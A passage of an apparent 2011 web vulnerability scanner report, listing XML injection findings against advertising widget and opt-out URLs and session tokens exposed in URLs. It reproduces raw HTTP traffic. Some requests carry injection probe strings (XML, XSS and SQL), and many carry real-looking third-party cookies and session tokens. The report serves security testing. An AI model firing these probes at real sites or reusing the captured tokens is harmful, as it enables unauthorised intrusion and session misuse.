Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503; ANALYTICS_USER_TOKEN=802756E5-8724-4943-AEFB-8B9150565A781316021953542

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 68D87CF9447DC0FE
x-amz-id-2: rPUISVhLeu7Xu4sKW8kjLxRZTdNNUPT+Dyxgb97YTKHT2Ed2Wgp/qSjXeJCgUV8L
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:24:08 GMT
Server: AmazonS3
Content-Length: 301

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>_fw/common]]&gt;&gt;/toppicks_common1.html</Key><RequestId>68D87CF9447DC0FE
...[SNIP]...
8.75. http://widget.newsinc.com/_fw/common/toppicks_common1.html [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://widget.newsinc.com
Path:   /_fw/common/toppicks_common1.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /_fw/common/toppicks_common1.html]]>>?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom&ZoneID=50912 HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/ndn_toppicks.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503; ANALYTICS_USER_TOKEN=802756E5-8724-4943-AEFB-8B9150565A781316021953542

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 54E359EE9AF0C6B8
x-amz-id-2: /u3u7SamzGNjbos/y1EQJBftOEGtb2WFjS+zgL1OrKDq3F2jZZeXk1rGXkVIISTy
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:24:10 GMT
Server: AmazonS3
Content-Length: 301

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>_fw/common/toppicks_common1.html]]&gt;&gt;</Key><RequestId>54E359EE9AF0C6B8
...[SNIP]...
8.76. http://widget.newsinc.com/ndn_toppicks.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://widget.newsinc.com
Path:   /ndn_toppicks.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /ndn_toppicks.html]]>>?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://www.stamfordadvocate.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503; ANALYTICS_USER_TOKEN=802756E5-8724-4943-AEFB-8B9150565A781316021953542

Response

HTTP/1.1 404 Not Found
x-amz-request-id: FB0F1A3FBE5DE59A
x-amz-id-2: InnYteLi2JcdkNLPD0ye4/wJo24HV+OpYuS7NONCCOJQFVdxUp+EapJtnab33ZJp
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:24:03 GMT
Server: AmazonS3
Content-Length: 286

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>ndn_toppicks.html]]&gt;&gt;</Key><RequestId>FB0F1A3FBE5DE59A</RequestId><Ho
...[SNIP]...
8.77. http://www.nexac.com/nai_optout.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.nexac.com
Path:   /nai_optout.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /nai_optout.php]]>>?nocache=2.007604E-03 HTTP/1.1
Host: www.nexac.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: na_tc=Y; OAX=Mhd7ak48ZSEAAtYi

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Sat, 17 Sep 2011 17:23:52 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.78. http://www.nexac.com/nai_status.php [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.nexac.com
Path:   /nai_status.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /nai_status.php]]>>?nocache=6.434709E-02 HTTP/1.1
Host: www.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=ignore; na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Sat, 17 Sep 2011 16:45:59 GMT
Server: lighttpd/1.4.19

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
9. Session token in URL  previous  next
There are 23 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

9.1. http://a.netmng.com/hic/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=140&nm_c=200&beacon=2010june&url=[URL_ENCODED_REFERER]&passback HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: u=5f8e79cc-32a7-4701-a3f9-9a6f407e1e04; cdb0=3.113127277138.2266; cdbp=0,19,0; cdb1=; cdb2=; cdb3=; evo5=y9dly9jlztlwn%7Cjt7hNTHSSalmkggJVXyhSde8uI0RYi0avPF9AY0XnbifcaFEMqtkWSNsqllaE9MQ5Qvh0ZHmhqMXkAoIXTUGZU9nxLLIhNudmIQN5of6vB4vDh9TPU%2BkidUnQnV8lGXbiXqzET%2B0owFsOY7lmNgxGEOtTQL1bpTEu6BKOYjD3vTaje3s7aq%2FXcF3VvAicm1lQLkj%2F4xYqajg6Hkhv3ajvfa0hDJicTSwWGgqJ3fkbNkq9P4Mn239%2FQZw1Oa1JeikVeYM4LDw69dHPcDMp640B018JRk419t7Ybt5PBcN%2B25GW5unwqzZ2QVrp2Do7sfbM50SDnIEvNKt%2BPwZ2q03xWEMWAygZ%2FHwhgko6UaL4l%2BDTKIK8G1sxYFjM8jeCaYRUCGPp56861XA%2FW%2FAabxKZO%2BDbQf4VcwQUPcIlH%2B70bVPJbw0lZSaD6n%2BtWQUI%2FiCfdnf2z2Mx6yFnIeqaD2HT7ziMAgr0%2BG9nfxa8YdgSVk9uYu8ZOaM6tn81eFLhaNX

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:04:23 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 15 Sep 2011 17:04:23 GMT
Last-Modified: Thu, 15 Sep 2011 17:04:23 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_display=%2BVh8H0s8fTT%2FyJTublM%2BiWVvC2%2BXgxUbUPO2JPfLmxQPJcLjX5qzTkpiNBBPst0wI%2BlXbtBUthwow7WNwjS2LQ%3D%3D; expires=Mon, 22-Aug-44591 17:04:23 GMT; path=/; domain=.netmng.com
Content-Length: 768
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Net_Mining_Evolution/B3846296.4;sz=728x90;ord=1316279063?"WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no
...[SNIP]...
</IFRAME><img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=1443&token=NETM8" width="1" height="1" border="0"/>
9.2. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: token_nai_advertising_com=1812733584; token_nai_adsonar_com=819977518; token_nai_tacoda_at_atwola_com=1032347115; token_nai_adtech_de=8239370; token_nai_ad_us-ec_adtechus_com=1128450710; token_nai_adserver_adtechus_com=1348442932; token_nai_adserverec_adtechus_com=1581270199; token_nai_adserverwc_adtechus_com=52531776; token_nai_glb_adtechus_com=585997419; s_vi=[CS]v1|2722E805851D03EA-400001380002FA31[CE]; s_pers=%20s_getnr%3D1314627287324-Repeat%7C1377699287324%3B%20s_nrgvo%3DRepeat%7C1377699287326%3B; UNAUTHID=1.a5de2f9cc54911e0b91bbfa5e75487be.f26b

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:22:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Content-Type: text/html
Content-Length: 13643


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<body onload='optOut();' >
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=1812733584' height='1' width='1'></iframe>
<br />
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=819977518' height='1' width='1'></iframe>
<br />
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=1032347115' height='1' width='1'></iframe>
<br />
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=8239370' height='1' width='1'></iframe>
<br />
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=1128450710' height='1' width='1'></iframe>
<br />
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=1348442932' height='1' width='1'></iframe>
<br />
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=1581270199' height='1' width='1'></iframe>
<br />
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=52531776' height='1' width='1'></iframe>
<br />
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9627201&token=585997419' height='1' width='1'></iframe>
...[SNIP]...
9.3. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=clr&advid=3420&token=RORO1 HTTP/1.1
Host: bh.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://rs.gwallet.com/r1/pixel/x1743
Cookie: V=ZZVrXBMk1mFi; cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A749%3B09%2F17%2F2011%3BDOTM5%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|531292.BO-00000000521444319.0|534889.y9dly9jlztlwn.0|538303.x.0|535461.9033442320916087634.0"; C2W4=3ZWkodKrBuUFHIpAOk9fo5hjK_amQu3P6HhM4sg24rYSrdGNgVCZJAg; cw=cw; FC1-WC=53620_1_3ELLi; vf=1

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: cw-app600
Set-Cookie: V=ZZVrXBMk1mFi; Domain=.contextweb.com; Expires=Tue, 11-Sep-2012 17:04:35 GMT; Path=/
Set-Cookie: cwbh1=3055%3B10%2F02%2F2011%3BMCRI1%0A1443%3B09%2F21%2F2011%3BNETM7%0A3283%3B10%2F06%2F2011%3BTMII1%0A996%3B10%2F12%2F2011%3BFACO1; Domain=.contextweb.com; Expires=Sun, 16-Sep-2012 17:04:35 GMT; Path=/
Content-Type: image/gif
Date: Sat, 17 Sep 2011 17:04:35 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;
9.4. http://info.yahoo.com/nai/nai-status.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://info.yahoo.com
Path:   /nai/nai-status.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /nai/nai-status.html?nocache=0.7688409 HTTP/1.1
Host: info.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060'%20or%201%3d1--%20=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234.3096072@1@234; adx=c166842@1316325303@1

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 17:37:22 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache, private
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 5244

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<!-- AltLogo -->
<img src=http://arc.help.yahoo.com/error.gif?r=1316281042&token=RLE2D86DgDdh2znKxq4xydlglyr6miRnEoOVh1mKEnwdikkROnSa37ibNBUupPNwYyJiBFO.McVUkb2EIYTLTTDWX_2Xpoqa_eHkjq43Ze38WfFt2rAHaVGTGWh7xEeLpbZl.x74PCVZxEBN2yeepoYAad2c9T7HyA9lEo.7d6.69WSWP1uuWuAGmI9TaC9lybkhFYkjxFiHn8KRuUYpGnJ_VUlnkB5tYSWolkgEHEXD.dMYg2rrdhn9rgSVhOozAAfA_HM.9TxX2z78lFIprSXoo3lq1wiPFWOJZJdOKIczIZF7cWUbM9xLJ7JkOJHQfZ7VuAp73wvBn7UlHRY.dkDDwFkPKftwD6t71mXmnr5y68CoVkvPQRsIh8NT4zP_8WJostmDHaIqkQ3WKEEl3ip.WYYg78P6TdV2Ot9JMSEvbKUza0rKBb7icBo.OVBet2NoodFOz0RNnoi.nl1L240Dpmy4Aqj1AvxUkNw7KS.TgbXycdHwJDp7i2I-&property=help.US&srv=info.yahoo.com alt="Yahoo!" width=42 height=41 border=0>
<!---------------->
...[SNIP]...
<!-- Temporary -->
While this error is usually temporary, if it continues and the above
solutions don't resolve your problem, please
<a href="http://arc.help.yahoo.com/arc/?token=RLE2D86DgDdh2znKxq4xydlglyr6miRnEoOVh1mKEnwdikkROnSa37ibNBUupPNwYyJiBFO.McVUkb2EIYTLTTDWX_2Xpoqa_eHkjq43Ze38WfFt2rAHaVGTGWh7xEeLpbZl.x74PCVZxEBN2yeepoYAad2c9T7HyA9lEo.7d6.69WSWP1uuWuAGmI9TaC9lybkhFYkjxFiHn8KRuUYpGnJ_VUlnkB5tYSWolkgEHEXD.dMYg2rrdhn9rgSVhOozAAfA_HM.9TxX2z78lFIprSXoo3lq1wiPFWOJZJdOKIczIZF7cWUbM9xLJ7JkOJHQfZ7VuAp73wvBn7UlHRY.dkDDwFkPKftwD6t71mXmnr5y68CoVkvPQRsIh8NT4zP_8WJostmDHaIqkQ3WKEEl3ip.WYYg78P6TdV2Ot9JMSEvbKUza0rKBb7icBo.OVBet2NoodFOz0RNnoi.nl1L240Dpmy4Aqj1AvxUkNw7KS.TgbXycdHwJDp7i2I-&.intl=us&property=help.US&srv=info.yahoo.com">let us know</a>
...[SNIP]...
9.5. http://info.yahoo.com/nai/nai-verify.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://info.yahoo.com
Path:   /nai/nai-verify.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /nai/nai-verify.html?optoutverify=true&opter=nai HTTP/1.1
Host: info.yahoo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: B=8d7n6ot73ufk2&b=4&d=4auM3vprYH0wsQ--&s=sl; AO=o=1

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 17:22:48 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache, private
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 5308

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<!-- AltLogo -->
<img src=http://arc.help.yahoo.com/error.gif?r=1316280168&token=jqA0gYqDgDfjbwtCnkekkQETaWYgxoIjfTcltiN.gnz8FanKNZ06Jer0x1aoxEzXPbel5kYhLjXdzOKiPLRM8zF7kbSVF4AVTe0xQSB0DwbBEvYlsW_Ht56AlrtRlA4MEmp7n.8saw_OXtFrzRAOW2Crg05btUf12EmYj2eaAdtfl1Q5tZP6Lg4vOrQF67IM47O1jyfb8tEN1vO0vMESkEHrjUda2WeNARPvYA5SAE9mOJHaW9qTQxDQtfHaUc9X_xmXFPi9zWJgAoKYH19NSTYKheq75cB0wa.cPdy19Wi0ZIdjJZgK3My7OfYcIwxZO4T7xV35KUFqwiJCNidAgIZsYtdZbHLQGmilZra7pv70LQsMWNu5SYW859eFRHoQg5nd1LH8ffeD6yttR8C7Wj3uFVzR.Nbw7JxPZz77i28ZwN4EHV4N.hXiAImLH6nqf5xBfZ6LK42.uqDp0melA5Cgc4o7sMPGEtb_F9dcAdDmAoVYk_Xg8iO9KvV3LxMba1s.kSW8U9HdFXtOXpFOum3m0.g-&property=help.US&srv=info.yahoo.com alt="Yahoo!" width=42 height=41 border=0>
<!---------------->
...[SNIP]...
<!-- Temporary -->
While this error is usually temporary, if it continues and the above
solutions don't resolve your problem, please
<a href="http://arc.help.yahoo.com/arc/?token=jqA0gYqDgDfjbwtCnkekkQETaWYgxoIjfTcltiN.gnz8FanKNZ06Jer0x1aoxEzXPbel5kYhLjXdzOKiPLRM8zF7kbSVF4AVTe0xQSB0DwbBEvYlsW_Ht56AlrtRlA4MEmp7n.8saw_OXtFrzRAOW2Crg05btUf12EmYj2eaAdtfl1Q5tZP6Lg4vOrQF67IM47O1jyfb8tEN1vO0vMESkEHrjUda2WeNARPvYA5SAE9mOJHaW9qTQxDQtfHaUc9X_xmXFPi9zWJgAoKYH19NSTYKheq75cB0wa.cPdy19Wi0ZIdjJZgK3My7OfYcIwxZO4T7xV35KUFqwiJCNidAgIZsYtdZbHLQGmilZra7pv70LQsMWNu5SYW859eFRHoQg5nd1LH8ffeD6yttR8C7Wj3uFVzR.Nbw7JxPZz77i28ZwN4EHV4N.hXiAImLH6nqf5xBfZ6LK42.uqDp0melA5Cgc4o7sMPGEtb_F9dcAdDmAoVYk_Xg8iO9KvV3LxMba1s.kSW8U9HdFXtOXpFOum3m0.g-&.intl=us&property=help.US&srv=info.yahoo.com">let us know</a>
...[SNIP]...
9.6. http://info.yahoo.com/nai/optout.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://info.yahoo.com
Path:   /nai/optout.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/optout.html?token=VjRBR0ZmS3AyMFQ- HTTP/1.1
Host: info.yahoo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: B=8d7n6ot73ufk2&b=3&s=qd

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:20:40 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://www.networkadvertising.org/optout/opt_failure.gif
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 81

<!-- w3.help.sp2.yahoo.com uncompressed/chunked Sat Sep 17 17:20:40 UTC 2011 -->
9.7. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=d63a4976-501a-446d-81e6-434d03d8388c&hostname=www.thedailygreen.com&location=%2F&url=http%3A%2F%2Fwww.thedailygreen.com%2F&sessionID=1316294737396.64046&fpc=383b06c-1327947bdf6-95861c2-1&ts1316294748890.0&r_sessionID=&hash_flag=&shr=&count=0&refDomain=hearst.com&refQuery=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fmetrix4media.php HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Sat, 17 Sep 2011 16:28:06 GMT
Connection: keep-alive

9.8. http://nai.ad.us-ec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=2828909&token=1128450710 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
